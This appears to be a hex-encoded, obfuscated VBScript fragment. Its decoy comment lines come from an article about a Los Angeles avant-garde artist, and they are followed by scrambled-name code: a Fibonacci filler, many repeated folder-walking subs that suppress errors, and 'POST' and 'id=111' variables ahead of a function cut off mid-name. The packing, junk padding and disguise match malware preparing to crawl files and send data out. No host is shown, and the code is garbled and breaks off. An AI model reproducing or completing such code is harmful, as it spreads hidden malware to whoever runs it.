0\x74\x68\x65\x20\x61\x76\x61\x6e\x74\x2d\x67\x61\x72\x64\x65\x20\x61\x72\x74\x69\x73\x74\x69\x63\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x74\x79\x20\x6f\x66\x20\x4c\x6f\x73\x20\x41\x6e\x67\x65\x6c\x65\x73\x3b\x20\x0d\x0a\x27\x61\x6d\x6f\x6e\x67\x20\x68\x65\x72\x20\x66\x72\x69\x65\x6e\x64\x73\x20\x77\x65\x72\x65\x20\x74\x68\x65\x20\x66\x69\x6c\x6d\x6d\x61\x6b\x65\x72\x73\x20\x43\x75\x72\x74\x69\x73\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x20\x61\x6e\x64\x20\x4b\x65\x6e\x6e\x65\x74\x68\x20\x41\x6e\x67\x65\x72\x2e\x20\x53\x68\x65\x20\x61\x70\x70\x65\x61\x72\x65\x64\x20\x69\x6e\x20\x74\x77\x6f\x20\x6f\x66\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x27\x73\x20\x66\x69\x6c\x6d\x73\x2c\x20\x54\x68\x65\x20\x57\x6f\x72\x6d\x77\x6f\x6f\x64\x20\x53\x74\x61\x72\x20\x61\x6e\x64\x20\x4e\x69\x67\x68\x74\x20\x54\x69\x64\x65\x2c\x20\x61\x73\x20\x77\x65\x6c\x6c\x20\x61\x73\x20\x69\x6e\x20\x0d\x0a\x27\x41\x6e\x67\x65\x72\x27\x73\x20\x66\x69\x6c\x6d\x20\x49\x6e\x61\x75\x67\x75\x72\x61\x74\x69\x6f\x6e\x20\x6f\x66\x20\x74\x68\x65\x20\x50\x6c\x65\x61\x73\x75\x72\x65\x20\x44\x6f\x6d\x65\x2e\x20\x49\x6e\x20\x6c\x61\x74\x65\x72\x20\x79\x65\x61\x72\x73\x2c\x20\x73\x68\x65\x20\x6d\x61\x64\x65\x20\x61\x70\x70\x65\x61\x72\x61\x6e\x63\x65\x73\x20\x69\x6e\x20\x61\x72\x74\x2d\x68\x6f\x75\x73\x65\x20\x66\x69\x6c\x6d\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x62\x79\x20\x4a\x6f\x68\x6e\x20\x43\x68\x61\x6d\x62\x65\x72\x6c\x61\x69\x6e\x20\x61\x6e\x64\x20\x43\x68\x69\x63\x6b\x20\x53\x74\x72\x61\x6e\x64\x2e\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x27\x73\x20\x72\x65\x63\x6f\x67\x6e\x69\x74\x69\x6f\x6e\x20\x61\x73\x20\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x20\x69\x6e\x63\x72\x65\x61\x73\x65\x64\x20\x61\x66\x74\x65\x72\x20\x68\x65\x72\x20\x64\x65\x61\x74\x68\x2c\x20\x61\x6e\x64\x20\x68\x65\x72\x20\x70\x61\x69\x6e\x74\x69\x6e\x67\x73\x20\x77\x65\x72\x65\x20\x73\x68\x6f\x77\x6e\x20\x69\x6e\x20\x65\x78\x68\x69\x62\x69\x74\x69\x6f\x6e\x73\x20\x61\x63\x72\x6f\x73\x73\x20\x74\x68\x65\x20\x63\x6f\x75\x6e\x74\x72\x79\x2e\x20\x28\x46\x75\x6c\x6c\x20\x61\x72\x74\x69\x63\x6c\x65\x2e\x2e\x2e\x29\x20\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x49\x66\x20\x4e\x20\x3c\x20\x32\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x20\x3d\x20\x4e\x0d\x0a\x20\x20\x45\x6c\x73\x65\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x20\x3d\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x31\x29\x20\x2b\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x32\x29\x0d\x0a\x20\x20\x45\x6e\x64\x20\x49\x66\x0d\x0a\x45\x6e\x64\x20\x46\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x6f\x72\x20\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x20\x3d\x20\x31\x20\x54\x6f\x20\x31\x36\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x3d\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x26\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x29\x20\x26\x20\x22\x3b\x20\x22\x0d\x0a\x4e\x65\x78\x74\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x44\x69\x6d\x20\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x2c\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x2c\x6e\x69\x6e\x69\x73\x61\x6f\x73\x64\x73\x61\x73\x73\x61\x73\x69\x2c\x20\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x2c\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x0d\x0a\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x32\x2b\x20\x31\x20\x2b\x20\x38\x20\x2d\x33\x20\x2d\x20\x32\x20\x2d\x32\x0d\x0a\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x20\x34\x2b\x31\x20\x2b\x20\x31\x32\x20\x2b\x31\x20\x2b\x32\x20\x2b\x33\x0d\x0a\x0d\x0a\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x20\x3d\x20\x22\x69\x64\x3d\x31\x31\x31\x22\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x6d\x53\x67\x42\x4f\x58\x20\x22\x2d\x20\x4e\x30\x54\x20\x53\x65\x61\x72\x63\x68\x3a\x20\x22\x20\x26\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x0d\x0a\x20\x0d\x0a\x20\x44\x69\x6d\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x70\x6f\x6e\x73\x65\x2c\x20\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x20\x3d\x20\x22\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x6e\x69\x6e\x6f\x73\x5a\x65\x72\x6f\x72\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x09\x0d\x0a\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x20\x3d\x20\x22\x50\x4f\x53\x54\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x64\x6f\x6b\x69\x6e\x61\x73\x54\x65\